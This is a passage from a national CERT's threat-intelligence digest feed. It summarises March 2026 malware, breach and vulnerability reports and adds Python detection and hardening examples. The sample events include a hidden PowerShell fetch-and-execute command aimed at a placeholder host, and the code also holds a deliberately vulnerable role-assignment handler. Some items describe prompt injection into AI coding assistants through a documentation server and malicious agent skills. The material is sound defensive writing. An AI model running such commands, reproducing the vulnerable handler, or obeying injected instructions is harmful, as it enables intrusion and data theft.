<a href="https://www.bleepingcomputer.com/news/security/microsoft-hackers-abusing-ai-at-every-stage-of-cyberattacks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/microsoft-hackers-abusing-ai-at-every-stage-of-cyberattacks/</a><br />
<a href="https://cyberscoop.com/microsoft-north-korea-ai-operations/" target="_blank" rel="noopener noreferrer nofollow ugc">https://cyberscoop.com/microsoft-north-korea-ai-operations/</a></li>
<li><strong>Fake CleanMyMac Site Installs SHub Stealer And Backdoors Crypto Wallets</strong><br />
"A convincing fake version of the popular Mac utility CleanMyMac is tricking users into installing malware. The site instructs visitors to paste a command into Terminal. If they do, it installs SHub Stealer, macOS malware designed to steal sensitive data including saved passwords, browser data, Apple Keychain contents, cryptocurrency wallets, and Telegram sessions. It can even modify wallet apps such as Exodus, Atomic Wallet, Ledger Wallet, and Ledger Live so attackers can later steal the wallet’s recovery phrase."<br />
<a href="https://www.malwarebytes.com/blog/threat-intel/2026/03/fake-cleanmymac-site-installs-shub-stealer-and-backdoors-crypto-wallets" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.malwarebytes.com/blog/threat-intel/2026/03/fake-cleanmymac-site-installs-shub-stealer-and-backdoors-crypto-wallets</a></li>
<li><strong>Middle East Conflict Fuels Opportunistic Cyber Attacks</strong><br />
"Threat actors often take advantage of major global events to fuel interest in their malicious activities. Zscaler ThreatLabz is diligently tracking a surge in cybercriminal activity that capitalizes on the elevated political climate in the Middle East. This increased malicious activity includes discoveries that are directly tied to the ongoing conflict, alongside other related findings."<br />
<a href="https://www.zscaler.com/blogs/security-research/middle-east-conflict-fuels-opportunistic-cyber-attacks" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.zscaler.com/blogs/security-research/middle-east-conflict-fuels-opportunistic-cyber-attacks</a></li>
<li><strong>Malware Brief: When The Supply Chain Becomes The Attack Surface</strong><br />
"For a long time, defenders focused on hardening the perimeter: patch your systems, train your users, lock down your endpoints. But as supply-chain threats multiply, attackers are increasingly bypassing perimeter defenses and walking straight in through trusted software, services and dependencies. That’s what makes software supply‑chain attacks so effective. Instead of compromising one company at a time, threat actors target a single vendor, developer account or build system and let trust do the rest of the work for them."<br />
<a href="https://blog.barracuda.com/2026/03/05/malware-brief-supply-chain-attack-surface" target="_blank" rel="noopener noreferrer nofollow ugc">https://blog.barracuda.com/2026/03/05/malware-brief-supply-chain-attack-surface</a></li>
<li><strong>VOID#GEIST: Stealthy Multi-Stage Python Loader With Embedded Runtime Deployment, Startup Persistence, And Fileless Early Bird APC Injection Into Explorer.exe</strong><br />
"Securonix Threat Research analyzed a stealthy, multi-stage malware intrusion chain utilizing an obfuscated batch script (non.bat) to deliver multiple encrypted RAT shellcode payloads corresponding to XWorm, XenoRAT, and AsyncRAT. The script establishes persistence by deploying a secondary batch script (spol.bat) into the Windows Startup folder, stages a legitimate embedded Python runtime from <a href="http://python.org" target="_blank" rel="noopener noreferrer nofollow ugc">python.org</a>, and decrypts encrypted shellcode blobs (new.bin, pul.bin, xn.bin) at runtime using external XOR key material (a.json, p.json, n.json)."<br />
<a href="https://www.securonix.com/blog/voidgeist-stealthy-multi-stage-python-loader/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securonix.com/blog/voidgeist-stealthy-multi-stage-python-loader/</a><br />
<a href="https://thehackernews.com/2026/03/multi-stage-voidgeist-malware.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/multi-stage-voidgeist-malware.html</a></li>
<li><strong>Microsoft Reveals ClickFix Campaign Using Windows Terminal To Deploy Lumma Stealer</strong><br />
"Microsoft on Thursday disclosed details of a new widespread ClickFix social engineering campaign that has leveraged the Windows Terminal app as a way to activate a sophisticated attack chain and deploy the Lumma Stealer malware. The activity, observed in February 2026, makes use of the terminal emulator program instead of instructing users to launch the Windows Run dialog and paste a command into it."<br />
<a href="https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html</a><br />
<a href="https://securityaffairs.com/189046/malware/microsoft-warns-of-clickfix-campaign-exploiting-windows-terminal-for-lumma-stealer.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/189046/malware/microsoft-warns-of-clickfix-campaign-exploiting-windows-terminal-for-lumma-stealer.html</a><br />
<a href="https://www.theregister.com/2026/03/06/microsoft_spots_clickfix_campaign_abusing/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/06/microsoft_spots_clickfix_campaign_abusing/</a></li>
<li><strong>Mobile Spyware Campaign Impersonates Israel's Red Alert Rocket Warning System</strong><br />
"Acronis Threat Research Unit (TRU) has been actively monitoring malware campaigns and threat activity leveraging recent geopolitical developments across the Middle East and abusing these events to deliver malware to individuals. During our investigation, TRU identified a targeted campaign distributing a trojanized version of the Red Alert rocket warning Android app to Israeli users via SMS messages impersonating official Home Front Command communications, aimed at Israeli individuals."<br />
<a href="https://www.acronis.com/en/tru/posts/mobile-spyware-campaign-impersonates-israels-red-alert-rocket-warning-system/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.acronis.com/en/tru/posts/mobile-spyware-campaign-impersonates-israels-red-alert-rocket-warning-system/</a><br />
<a href="https://www.theregister.com/2026/03/06/spyware_disguised_as_emergency_alert/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/06/spyware_disguised_as_emergency_alert/</a><br />
<a href="https://hackread.com/hackers-fake-red-alert-rocket-alert-app-spy-israel-users/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/hackers-fake-red-alert-rocket-alert-app-spy-israel-users/</a></li>
<li><strong>An Investigation Into Years Of Undetected Operations Targeting High-Value Sectors</strong><br />
"Since at least 2020, we have observed a cluster of activity targeting high-value organizations across South, Southeast and East Asia. The attacks focus on critical sectors such as aviation, energy, government, law enforcement, pharmaceutical, technology and telecommunications. Unit 42 is tracking this ongoing, previously undocumented activity as CL-UNK-1068. We designate the term UNK to clusters of activity whose affiliation with either nation-state or cybercrime activity we have not yet determined."<br />
<a href="https://unit42.paloaltonetworks.com/cl-unk-1068-targets-critical-sectors/" target="_blank" rel="noopener noreferrer nofollow ugc">https://unit42.paloaltonetworks.com/cl-unk-1068-targets-critical-sectors/</a></li>
<li><strong>Dark Web Profile: APT41</strong><br />
"APT41 stands out in the threat landscape because it doesn’t stick to a single playbook. It has been repeatedly linked to both cyber espionage and financially motivated cybercrime, sometimes running those missions side by side. That dual-track model, paired with exploit-driven access and long-dwell intrusions, makes APT41 a high-signal profile for defenders looking to understand how modern operations blend strategy, stealth, and scale."<br />
<a href="https://socradar.io/blog/dark-web-profile-apt41/" target="_blank" rel="noopener noreferrer nofollow ugc">https://socradar.io/blog/dark-web-profile-apt41/</a></li>
<li><strong>Iranian APT Infrastructure In Focus: Mapping State-Aligned Clusters During Geopolitical Escalation</strong><br />
"Tensions between the United States, Israel, and Iran have reached a critical point following a series of diplomatic breakdowns, which led to escalating military exchanges and proxy engagements across the Middle East. History has shown that when hostilities rise to this degree, cyber operations do not lag far behind kinetic activity. They precede it. These operations, whether infrastructure reconnaissance, pre-positioning, or network intrusion, are part of the operational groundwork of modern conflict. Disrupting communications and compromising critical systems can weaken response capabilities long before physical engagement begins. Iranian state-aligned actors have historically targeted energy, financial services, government networks, and defense-related organizations across the U.S., Israel, and allied regions."<br />
<a href="https://hunt.io/blog/iranian-apt-infrastructure-state-aligned-clusters" target="_blank" rel="noopener noreferrer nofollow ugc">https://hunt.io/blog/iranian-apt-infrastructure-state-aligned-clusters</a></li>
<li><strong>OCRFix Botnet Hides C2 In BNB Smart Chain Contracts</strong><br />
"OCRFix is a three-stage botnet that stores its C2 URLs inside BNB Smart Chain testnet smart contracts. Each stage queries a contract via JSON-RPC at runtime to get the current C2 domain. To rotate infrastructure, the author updates the contract storage with a single blockchain transaction. Every infected machine follows on next check-in. No binary update required. Initial access is ClickFix -- a fake CAPTCHA that walks the victim through opening Windows Run and pasting a PowerShell command the page has placed in their clipboard."<br />
<a href="https://www.derp.ca/research/ocrfix-etherhiding-botnet/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.derp.ca/research/ocrfix-etherhiding-botnet/</a></li>
<li><strong>Termite Ransomware Breaches Linked To ClickFix CastleRAT Attacks</strong><br />
"Ransomware threat actors tracked as Velvet Tempest are using the ClickFix technique and legitimate Windows utilities to deploy the DonutLoader malware and the CastleRAT backdoor. Researchers at cyber-deception threat intelligence firm MalBeacon observed the hackers' actions in an emulated organization environment over a period of 12 days. Velvet Tempest, also tracked as DEV-0504, is a threat group that has been involved in ransomware attacks as an affiliate for at least five years."<br />
<a href="https://www.bleepingcomputer.com/news/security/termite-ransomware-breaches-linked-to-clickfix-castlerat-attacks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/termite-ransomware-breaches-linked-to-clickfix-castlerat-attacks/</a></li>
</ul>
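<p dir="auto">Several items above (the Windows Terminal ClickFix campaign, the OCRFix Run-dialog lure, the CastleRAT intrusions) share one execution shape: a shell started from the user's interactive launcher, carrying a download-and-execute command the victim pasted from the clipboard. The Python below is an added hunting example, not code from Microsoft, derp.ca or MalBeacon. It runs a heuristic over constructed process-creation records (parent image, image, command line) and flags shells spawned from explorer.exe (which hosts the Run dialog) or WindowsTerminal.exe that also carry a download cradle, encoded command or hidden-window switch. The launcher names, indicator list, field names and sample events are assumptions of this example; the macOS lures on this page (InstallFix, the CleanMyMac clone) need the equivalent parent chain for that platform's sensor and are not modelled here.</p>

```python
"""Heuristic hunt for ClickFix / paste-and-run execution chains in process-creation telemetry.

Added example, not code from Microsoft, derp.ca or MalBeacon. Field names follow a generic
process-creation record (parent_image, image, command_line) rather than any sensor's schema;
the launcher names, indicator list and sample events are this example's assumptions.
"""
import re

# Processes a user interacts with directly: the Run dialog is hosted by explorer.exe, and
# Windows Terminal launches its shells as children of WindowsTerminal.exe.
INTERACTIVE_LAUNCHERS = {"explorer.exe", "windowsterminal.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# (pattern, label) pairs matched against the lower-cased command line
CRADLE_PATTERNS = [
    (r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", "download cradle"),
    (r"\b(iex|invoke-expression)\b", "in-memory execution"),
    (r"(^|\s)-(e|ec|enc|encodedcommand)\s", "encoded command"),
    (r"(^|\s)-w(indowstyle)?\s+hidden\b", "hidden window"),
    (r"\bmshta(\.exe)?\b.*https?://", "mshta with remote content"),
]


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event):
    """Return the reasons an event looks like a paste-and-run lure; an empty list means no hit.

    A hit requires both signals: a shell started directly from an interactive launcher AND
    at least one cradle indicator in its command line. A user opening PowerShell from the
    Run dialog, or a service running a hidden script, each trips only one and is ignored.
    """
    if basename(event["image"]) not in SHELLS:
        return []
    parent = basename(event["parent_image"])
    if parent not in INTERACTIVE_LAUNCHERS:
        return []
    command = event["command_line"].lower()
    indicators = [label for pattern, label in CRADLE_PATTERNS if re.search(pattern, command)]
    if not indicators:
        return []
    return ["shell spawned directly from %s" % parent] + indicators


def hunt(events):
    """Return (index, reasons) for every event in the batch that trips the heuristic."""
    hits = []
    for index, event in enumerate(events):
        reasons = score_event(event)
        if reasons:
            hits.append((index, reasons))
    return hits


# Constructed sample telemetry, not real captures. The hostname is a reserved example domain.
SAMPLE_EVENTS = [
    {   # fake-CAPTCHA lure: Run dialog, hidden window, fetch and execute in memory
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -w hidden -c "iex (irm https://captcha-verify.example/v.ps1)"',
    },
    {   # Windows Terminal variant with an encoded command (payload is a harmless placeholder)
        "parent_image": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.0_x64\WindowsTerminal.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwA=",
    },
    {   # benign: an admin opens PowerShell from the Run dialog and lists a directory
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell Get-ChildItem C:\Temp",
    },
    {   # benign: a scheduler service runs a hidden maintenance script (no interactive parent)
        "parent_image": r"C:\Program Files\Scheduler\svc.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell -w hidden -File C:\ops\backup.ps1",
    },
]

if __name__ == "__main__":
    for index, reasons in hunt(SAMPLE_EVENTS):
        print("event %d: %s" % (index, "; ".join(reasons)))
```

<p dir="auto">The two-signal requirement is the point of the design: either signal alone (an interactive parent, or a hidden-window switch) is everyday administration, while the pair is the lure pattern every ClickFix variant on this page relies on. Tune INTERACTIVE_LAUNCHERS and CRADLE_PATTERNS to what your own telemetry shows before treating hits as alerts.</p>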
<p dir="auto"><strong>Breaches/Hacks/Leaks</strong></p>
<ul>
<li><strong>Cognizant TriZetto Breach Exposes Health Data Of 3.4 Million Patients</strong><br />
"TriZetto Provider Solutions, a healthcare IT company that develops software and services used by health insurers and healthcare providers, has suffered a data breach that exposed the sensitive information of over 3.4 million people. The firm, which has been operating under the Cognizant umbrella since 2014, disclosed that it detected suspicious activity on a web portal on October 2, 2025, and launched an investigation with the help of external cybersecurity experts."<br />
<a href="https://www.bleepingcomputer.com/news/security/cognizant-trizetto-breach-exposes-health-data-of-34-million-patients/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/cognizant-trizetto-breach-exposes-health-data-of-34-million-patients/</a></li>
<li><strong>2,622 Valid Certificates Exposed: A Google-GitGuardian Study Maps Private Key Leaks To Real-World Risk</strong><br />
"When a private key leaks on GitHub or DockerHub, detecting it is easy. What's harder, sometimes impossible, is understanding its real-world impact. Unlike AWS keys or OpenAI tokens, which are tied to their respective service, a leaked private key is just a mathematical object without an obvious owner. Private keys are challenging to attribute at scale: they are used in many different contexts, ranging from SSH authentication to JWT signatures. When one leaks, where do you start assessing the impact? Among leaked private keys, those used in X.509 infrastructure are most critical. They authenticate web servers in HTTPS: a compromised key enables attackers to impersonate websites or intercept data. That's why GitGuardian partnered with Google's researchers to answer a deceptively simple question: what happens when private keys leak?"<br />
<a href="https://blog.gitguardian.com/certificates-exposed-a-google-gitguardian-study/" target="_blank" rel="noopener noreferrer nofollow ugc">https://blog.gitguardian.com/certificates-exposed-a-google-gitguardian-study/</a><br />
<a href="https://hackread.com/certificates-fortune-500-gov-exposed-key-leaks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/certificates-fortune-500-gov-exposed-key-leaks/</a></li>
<li><strong>Transport For London Says 2024 Breach Affected 7M Customers, Not 5,000</strong><br />
"Transport for London has confirmed that a 2024 breach exposed the data of more than 7 million people – a far larger crowd than the few thousand customers originally warned that their details might be at risk. The BBC reported on Friday that the 2024 intrusion into TfL's systems potentially gave attackers access to a database covering as many as 10 million customers who had interacted with the capital's transport network."<br />
<a href="https://www.theregister.com/2026/03/06/tfl_2024_breach_numbers/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/06/tfl_2024_breach_numbers/</a></li>
</ul>
<p dir="auto"><strong>General News</strong></p>
<ul>
<li><strong>Cyberattack On Mexico's Gov't Agencies Highlights AI Threat</strong><br />
"For any cyber-defender continuing to deny the impact of AI on attacker efficiency, welcome to Exhibit A. Over the past few months, a small group of hacktivists compromised the computers and networks of at least nine Mexican government agencies, stealing more than 195 million identities and tax records, along with vehicle registrations and more than 2.2 million property records, startup Gambit Security stated in a blog post this week that detailed the attack."<br />
<a href="https://www.darkreading.com/application-security/cyberattack-mexico-government-ai-threat" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.darkreading.com/application-security/cyberattack-mexico-government-ai-threat</a></li>
<li><strong>Backup Strategies Are Working, And Ransomware Gangs Are Responding With Data Theft</strong><br />
"Business email compromise (BEC) and funds transfer fraud combined for 58% of all cyber insurance claims filed in 2025, according to data from Coalition covering more than 100,000 policyholders across the United States, Canada, the United Kingdom, Australia, and Germany. BEC was the single most common claim type at 31%, with frequency rising 15% year over year to 0.47%. Average losses per BEC incident dropped 28% to $27,000, a decline attributed to faster detection and response by affected organizations."<br />
<a href="https://www.helpnetsecurity.com/2026/03/06/cyber-claims-report-ransomware-gangs-data-theft/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/06/cyber-claims-report-ransomware-gangs-data-theft/</a></li>
<li><strong>What Happens When AI Teams Compete Against Human Hackers</strong><br />
"A cybersecurity competition produced what may be the largest controlled dataset comparing AI-augmented teams to human-only teams on professional-grade offensive security tasks. The event, called NeuroGrid, ran for 72 hours on the Hack The Box platform and drew 1,337 registered human-only teams and 156 registered AI-agent teams competing across 36 challenges in nine security domains at four difficulty levels. AI teams operated through Model Context Protocol with human oversight in the loop. The analysis covers 958 human teams and 120 AI-agent teams that each attempted at least one challenge."<br />
<a href="https://www.helpnetsecurity.com/2026/03/06/cybersecurity-competition-ai-vs-human-hackers/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/06/cybersecurity-competition-ai-vs-human-hackers/</a></li>
<li><strong>Exploits And Vulnerabilities In Q4 2025</strong><br />
"The fourth quarter of 2025 went down as one of the most intense periods on record for high-profile, critical vulnerability disclosures, hitting popular libraries and mainstream applications. Several of these vulnerabilities were picked up by attackers and exploited in the wild almost immediately. In this report, we dive into the statistics on published vulnerabilities and exploits, as well as the known vulnerabilities leveraged with popular C2 frameworks throughout Q4 2025."<br />
<a href="https://securelist.com/vulnerabilities-and-exploits-in-q4-2025/119105/" target="_blank" rel="noopener noreferrer nofollow ugc">https://securelist.com/vulnerabilities-and-exploits-in-q4-2025/119105/</a></li>
<li><strong>Viral AI, Invisible Risks: What OpenClaw Reveals About Agentic Assistants</strong><br />
"The name OpenClaw might not immediately be recognizable, partly because it has undergone several name changes, from Clawdbot to Moltbot, then finally to OpenClaw. Yet one thing is certain: This new digital assistant feels genuinely groundbreaking. It remembers past interactions, keeps data on the user’s device, and adapts to individual preferences, making it feel like a leap in capabilities reminiscent of the first ChatGPT release. At the same time, its development is not without caveats, as there have been media headlines that warn of its potential as a security nightmare."<br />
<a href="https://www.trendmicro.com/en_us/research/26/b/what-openclaw-reveals-about-agentic-assistants.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.trendmicro.com/en_us/research/26/b/what-openclaw-reveals-about-agentic-assistants.html</a></li>
<li><strong>AI Agents Now Help Attackers, Including North Korea, Manage Their Drudge Work</strong><br />
"AI agents allow cybercriminals and nation-state hackers to outsource the "janitorial-type work" needed to plan and carry out cyberattacks, according to Sherrod DeGrippo, Microsoft's GM of global threat intelligence. North Korea is taking advantage. This includes tasks such as performing reconnaissance on compromised computers, and standing up and managing attack infrastructure - which may not sound as thrilling as plotting and carrying out digital intrusions, but are real-world criminal use cases for agentic AI that should make threat hunters sit up and take notice."<br />
<a href="https://www.theregister.com/2026/03/08/deploy_and_manage_attack_infrastructure/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/08/deploy_and_manage_attack_infrastructure/</a></li>
</ul>
<p dir="auto"><strong>Reference</strong><br />
Electronic Transactions Development Agency (ETDA) <img src="/assets/uploads/files/1773029923640-3709bc93-b715-4aa5-80ff-2b994be63a58-image.png" alt="3709bc93-b715-4aa5-80ff-2b994be63a58-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2678/cyber-threat-intelligence-09-march-2026</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2678/cyber-threat-intelligence-09-march-2026</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Mon, 09 Mar 2026 04:18:44 GMT</pubDate></item><item><title><![CDATA[Cyber Threat Intelligence 06 March 2026]]></title><description><![CDATA[<p dir="auto"><strong>Vulnerabilities</strong></p>
<ul>
<li><strong>Cisco Flags More SD-WAN Flaws As Actively Exploited In Attacks</strong><br />
"Cisco has flagged two Catalyst SD-WAN Manager security flaws as actively exploited in the wild, urging administrators to upgrade vulnerable devices. Catalyst SD-WAN Manager (formerly vManage) is network management software that enables admins to monitor and manage up to 6,000 Catalyst SD-WAN devices from a single centralized dashboard. "In March 2026, the Cisco PSIRT became aware of active exploitation of the vulnerabilities that are described in CVE-2026-20128 and CVE-2026-20122 only," the company warned in an update to a February 25 advisory."<br />
<a href="https://www.bleepingcomputer.com/news/security/cisco-flags-more-sd-wan-flaws-as-actively-exploited-in-attacks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/cisco-flags-more-sd-wan-flaws-as-actively-exploited-in-attacks/</a><br />
<a href="https://www.securityweek.com/cisco-warns-of-more-catalyst-sd-wan-flaws-exploited-in-the-wild/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/cisco-warns-of-more-catalyst-sd-wan-flaws-exploited-in-the-wild/</a><br />
<a href="https://www.helpnetsecurity.com/2026/03/05/cisco-cve-2026-20128-cve-2026-20122-exploited/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/05/cisco-cve-2026-20128-cve-2026-20122-exploited/</a></li>
<li><strong>User Registration &amp; Membership &lt;= 5.1.2 - Unauthenticated Privilege Escalation Via Membership Registration</strong><br />
"The User Registration &amp; Membership – Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction &amp; Membership Plugin plugin for WordPress is vulnerable to improper privilege management in all versions up to, and including, 5.1.2. This is due to the plugin accepting a user-supplied role during membership registration without properly enforcing a server-side allowlist. This makes it possible for unauthenticated attackers to create administrator accounts by supplying a role value during membership registration."<br />
<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-512-unauthenticated-privilege-escalation-via-membership-registration" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-512-unauthenticated-privilege-escalation-via-membership-registration</a><br />
<a href="https://www.bleepingcomputer.com/news/security/wordpress-membership-plugin-bug-exploited-to-create-admin-accounts/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/wordpress-membership-plugin-bug-exploited-to-create-admin-accounts/</a></li>
<li><strong>ContextCrush Flaw Exposes AI Development Tools To Attacks</strong><br />
"A critical vulnerability affecting the Context7 MCP Server, a widely used tool for delivering documentation to AI coding assistants, has been disclosed by security researchers. The issue, dubbed ContextCrush, could allow attackers to inject malicious instructions into AI development tools through a trusted documentation channel. The flaw was discovered by Noma Labs researchers in the Context7 platform operated by Upstash. Context7 is used by developers to provide AI assistants such as Cursor, Claude Code and Windsurf with up-to-date library documentation directly inside integrated development environments."<br />
<a href="https://www.infosecurity-magazine.com/news/contextcrush-ai-development-tools/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.infosecurity-magazine.com/news/contextcrush-ai-development-tools/</a></li>
<li><strong>CISA Adds Five Known Exploited Vulnerabilities To Catalog</strong><br />
"CISA has added five new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.<br />
CVE-2017-7921 Hikvision Multiple Products Improper Authentication Vulnerability<br />
CVE-2021-22681 Rockwell Multiple Products Insufficient Protected Credentials Vulnerability<br />
CVE-2021-30952 Apple Multiple Products Integer Overflow or Wraparound Vulnerability<br />
CVE-2023-41974 Apple iOS and iPadOS Use-After-Free Vulnerability<br />
CVE-2023-43000 Apple Multiple products Use-After-Free Vulnerability"<br />
<a href="https://www.cisa.gov/news-events/alerts/2026/03/05/cisa-adds-five-known-exploited-vulnerabilities-catalog" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/alerts/2026/03/05/cisa-adds-five-known-exploited-vulnerabilities-catalog</a></li>
</ul>
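<p dir="auto">The Wordfence description above is a textbook case of trusting a client-supplied role: the request decides the privilege level and nothing on the server narrows it. The Python below is an added example, not the plugin's PHP code (Python is used here so it can be run directly). It places the vulnerable handler beside a hardened one in which the role is derived on the server from the membership plan and then checked against a fixed allowlist of roles a visitor may obtain by self-registration, and adds the post-patch sweep a responder would want, since the bug creates real administrator accounts that survive the update. The role names are WordPress's built-in roles; the form fields, plan-to-role mapping, user records and function names are assumptions of this example.</p>

```python
"""Client-supplied role at self-registration: vulnerable handler beside a hardened one.

Added example in Python, not the WordPress plugin's PHP. The role names are WordPress's
built-in roles; the form fields, plan-to-role mapping and function names are assumptions.
"""

WP_ROLES = {"administrator", "editor", "author", "contributor", "subscriber"}

# The only role a visitor may obtain by registering themselves. Anything else has to be
# granted later by an authenticated administrator.
SELF_REGISTRATION_ALLOWLIST = {"subscriber"}

# Server-side mapping from membership plan to the role it confers (assumed configuration).
PLAN_ROLES = {"free": "subscriber", "supporter": "subscriber"}


def register_vulnerable(form):
    """Mirrors the bug class in the advisory: the request decides the role.

    Validating against the full role list is not a fix; 'administrator' is a valid role.
    """
    role = form.get("role", "subscriber")
    if role not in WP_ROLES:
        raise ValueError("unknown role %r" % role)
    return {"username": form["username"], "role": role}


def register_hardened(form, plan_roles=PLAN_ROLES):
    """Role is derived on the server from the chosen plan and then allowlisted.

    Any 'role' field in the request is ignored, so an attacker cannot steer the
    outcome; and even a misconfigured plan cannot hand out a role outside the
    allowlist, because the check is on the resulting role, not on the input.
    """
    plan = form.get("membership_plan", "free")
    role = plan_roles.get(plan)
    if role is None:
        raise ValueError("unknown membership plan %r" % plan)
    if role not in SELF_REGISTRATION_ALLOWLIST:
        raise PermissionError(
            "plan %r would grant %r, which self-registration may not assign" % (plan, role)
        )
    return {"username": form["username"], "role": role}


def find_unexpected_admins(users, known_admins):
    """Post-incident sweep: administrator accounts not on the approved list.

    Run this against the user table after patching; the advisory's bug creates
    real administrator accounts, so patching alone does not remove them.
    users is a list of {"username": ..., "role": ...} records (assumed shape).
    """
    return sorted(
        user["username"]
        for user in users
        if user["role"] == "administrator" and user["username"] not in known_admins
    )
```

<p dir="auto">Note that the hardened handler fails closed twice: an unknown plan is refused, and a plan that maps to anything other than an allowlisted role is refused even though the mapping is server-controlled. That second check is what protects you when a later configuration change, not an attacker, is the thing that goes wrong.</p>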
<p dir="auto"><strong>Malware</strong></p>
<ul>
<li>
<p dir="auto"><strong>UAT-9244 Targets South American Telecommunication Providers With Three New Malware Implants</strong><br />
"UAT-9244 used dynamic-link library (DLL) side-loading to activate multiple stages of their infection chain. The actor executed “wsprint[.]exe”, a benign executable that loaded the malicious DLL-based loader “BugSplatRc64[.]dll”. The DLL reads a data file named “WSPrint[.]dll” from disk, decrypts its contents, and executes them in memory to activate TernDoor, the final payload. TernDoor is a variant of CrowDoor, a backdoor deployed in recent intrusions linked to China-nexus APTs such as FamousSparrow and Earth Estries. CrowDoor is a variant of SparrowDoor, another backdoor attributed to FamousSparrow. CrowDoor has also been observed in previous Tropic Trooper intrusions, indicating a close operational relationship with FamousSparrow."<br />
<a href="https://blog.talosintelligence.com/uat-9244/" target="_blank" rel="noopener noreferrer nofollow ugc">https://blog.talosintelligence.com/uat-9244/</a><br />
<a href="https://www.bleepingcomputer.com/news/security/chinese-state-hackers-target-telcos-with-new-malware-toolkit/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/chinese-state-hackers-target-telcos-with-new-malware-toolkit/</a></p>
</li>
<li>
<p dir="auto"><strong>ClipXDaemon: Autonomous X11 Clipboard Hijacker Delivered Via Bincrypter-Based Loader</strong><br />
"In early February 2026, Cyble Research &amp; Intelligence Labs (CRIL) identified a new Linux malware strain delivered through a loader structure previously associated with ShadowHS activity. While ShadowHS samples deployed post-exploitation tooling, the newly observed payload is operationally different. We have named it ClipXDaemon, an autonomous cryptocurrency clipboard hijacker targeting Linux X11 environments."<br />
<a href="https://cyble.com/blog/clipxdaemon-autonomous-x11-clipboard-hijacker/" target="_blank" rel="noopener noreferrer nofollow ugc">https://cyble.com/blog/clipxdaemon-autonomous-x11-clipboard-hijacker/</a></p>
</li>
<li>
<p dir="auto"><strong>New BoryptGrab Stealer Targets Windows Users Via Deceptive GitHub Pages</strong><br />
"We recently found the existence of a new stealer binary that collects browser and cryptocurrency wallet data, system information, and common files, among others. We designated this new stealer BoryptGrab. Certain variants of the stealer can download a PyInstaller backdoor, which we refer to as TunnesshClient. TunnesshClient establishes a reverse Secure Shell (SSH) tunnel to enable communication with the attacker."<br />
<a href="https://www.trendmicro.com/en_us/research/26/c/boryptgrab-stealer-targets-users-via-deceptive-github-pages.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.trendmicro.com/en_us/research/26/c/boryptgrab-stealer-targets-users-via-deceptive-github-pages.html</a></p>
</li>
<li>
<p dir="auto"><strong>Bing AI Promoted Fake OpenClaw GitHub Repo Pushing Info-Stealing Malware</strong><br />
"Fake OpenClaw installers hosted in GitHub repositories and promoted by Microsoft Bing’s AI-enhanced search feature instructed users to run commands that deployed information stealers and proxy malware. OpenClaw is an open-source AI agent that gained popularity as a personal assistant capable of executing tasks. It has access to local files and can integrate with email, messaging apps, and online services. Due to its widespread local access, threat actors saw an opportunity to collect sensitive information by publishing malicious skills (instruction files) on the tool's official registry and GitHub."<br />
